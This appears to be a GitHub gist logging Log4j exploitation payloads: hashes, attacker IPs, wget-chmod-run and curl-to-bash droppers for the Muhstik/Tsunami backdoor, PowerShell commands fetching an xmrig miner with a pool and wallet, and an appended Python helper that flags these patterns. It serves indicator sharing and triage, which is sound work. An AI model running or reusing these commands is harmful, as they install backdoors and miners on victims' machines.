@yt0ng
Last active December 15, 2021 03:13
Log4j Payload Dropped
45.130.229.168:1389/Exploit.class
Exploit.class 4d040caffa28e6a0fdc0d274547cf1c7983996fc33e51b0b2c511544f030d71b
--> curl http://18.228.7.109/.log/log
log d59dba711478b6c6fdba87a9cfc9af753783c4d9120111a9ef026c9362a8e74b
--> Download of Muhstik/Tsunami Backdoor
wget -O /tmp/pty3 http://18.228.7.109/.log/pty3; chmod +x /tmp/pty3; chmod 700 /tmp/pty3; /tmp/pty3 &
wget -O /tmp/pty4 http://18.228.7.109/.log/pty4; chmod +x /tmp/pty4; chmod 700 /tmp/pty4; /tmp/pty4 &
wget -O /tmp/pty2 http://18.228.7.109/.log/pty2; chmod +x /tmp/pty2; chmod 700 /tmp/pty2; /tmp/pty2 &
wget -O /tmp/pty1 http://18.228.7.109/.log/pty1; chmod +x /tmp/pty1; chmod 700 /tmp/pty1; /tmp/pty1 &
wget -O /tmp/pty3 http://18.228.7.109/.log/pty3; chmod +x /tmp/pty3; chmod 700 /tmp/pty3; /tmp/pty3 &
wget -O /tmp/pty5 http://18.228.7.109/.log/pty5; chmod +x /tmp/pty5; chmod 700 /tmp/pty5; /tmp/pty5 &
pty3 4f34f8f156fdf12e0817a610344b11abdee87cfbed862bf91eb7685c63696898
--> download of Muhstik/Tsunami
(curl http://210.141.105.67:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://210.141.105.67:80/wp-content/themes/twentythirteen/m8)|bash
(curl http://210.141.105.67:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://210.141.105.67:80/wp-content/themes/twentythirteen/m8)|bash
(curl http://159.89.182.117/wp-content/themes/twentyseventeen/ldm || wget -qO - http://159.89.182.117/wp-content/themes/twentyseventeen/ldm)|bash
m8 80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514
ldm 39db1c54c3cc6ae73a09dd0a9e727873c84217e8f3f00e357785fba710f98129
######
Exploit.class
2b5f04d15e459132a5935260746788db39b469ea46859c4a5bb8625f8a80bd41
--> uses curl on Linux to download http://18.228.7.109/.log/log
--> and uses PowerShell on Windows
(new-object System.Net.WebClient).Downloadfile('http://172.105.241.146:80/wp-content/themes/twentysixteen/s.cmd', 's.cmd')
s.cmd 8A009DEE6BFB6F79C0881F5D150EEAD92C93354D47FD1CB204791320D2151634
--> downloads xmrig
powershell -w hidden -c (new-object System.Net.WebClient).Downloadfile('http://54.210.230.186:80/wp-content/themes/twentyfourteen/xmrig.exe','xmrig.exe')
xmrig.exe -o pool.supportxmr.com:5555 -u 46QBumovWy4dLJ4R8wq8JwhHKWMhCaDyNDEzvxHFmAHn92EyKrttq6LfV6if5UYDAyCzh3egWXMhnfJJrEhWkMzqTPzGzsE -p log
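As an added example (not part of this gist), a small Python triage helper for captured command lines like the ones above: it pulls out URLs and hosts, flags the two dropper shapes recorded here (wget into /tmp, chmod, run in background; and curl-or-wget piped to bash), and matches hosts against the IPs listed in this gist. The regexes and the watchlist set are my own assumptions, not something the gist author published.

```python
import re
from urllib.parse import urlparse

# Hosts that appear in the dropper chain recorded in the gist, used as a watchlist.
WATCHLIST_HOSTS = {
    "45.130.229.168", "18.228.7.109", "210.141.105.67",
    "159.89.182.117", "172.105.241.146", "54.210.230.186",
}

URL_RE = re.compile(r"https?://[^\s'\"|;)]+")
# wget -O <path> <url> ... chmod +x <path> ... <path> &   (download, mark executable, run in background)
DROP_EXEC_RE = re.compile(r"wget\s+-O\s+(\S+)\s+\S+.*chmod\s+\+x\s+\1.*\1\s*&")
# (curl <url> || wget -qO - <url>)|bash   (fetch a script and pipe it straight into a shell)
PIPE_TO_SHELL_RE = re.compile(
    r"\(\s*curl\s+\S+\s*\|\|\s*wget\s+-qO\s*-\s+\S+\s*\)\s*\|\s*(?:ba)?sh"
)

def analyze(cmdline):
    """Return URLs, hosts and a list of finding tags for one command line."""
    urls = URL_RE.findall(cmdline)
    hosts = {urlparse(u).hostname for u in urls}
    findings = []
    m = DROP_EXEC_RE.search(cmdline)
    if m:
        findings.append("drop-chmod-exec:" + m.group(1))
    if PIPE_TO_SHELL_RE.search(cmdline):
        findings.append("pipe-to-shell")
    hits = sorted(hosts & WATCHLIST_HOSTS)
    if hits:
        findings.append("watchlist-host:" + ",".join(hits))
    return {"urls": urls, "hosts": sorted(hosts), "findings": findings}

# Sample input: two dropper lines copied from the gist plus one benign line for contrast.
SAMPLE_CMDS = [
    "wget -O /tmp/pty3 http://18.228.7.109/.log/pty3; chmod +x /tmp/pty3; chmod 700 /tmp/pty3; /tmp/pty3 &",
    "(curl http://210.141.105.67:80/wp-content/themes/twentythirteen/m8 || "
    "wget -qO - http://210.141.105.67:80/wp-content/themes/twentythirteen/m8)|bash",
    "ls -la /tmp",
]

if __name__ == "__main__":
    for cmd in SAMPLE_CMDS:
        result = analyze(cmd)
        if result["findings"]:
            print(result["findings"], "<-", cmd[:60])
```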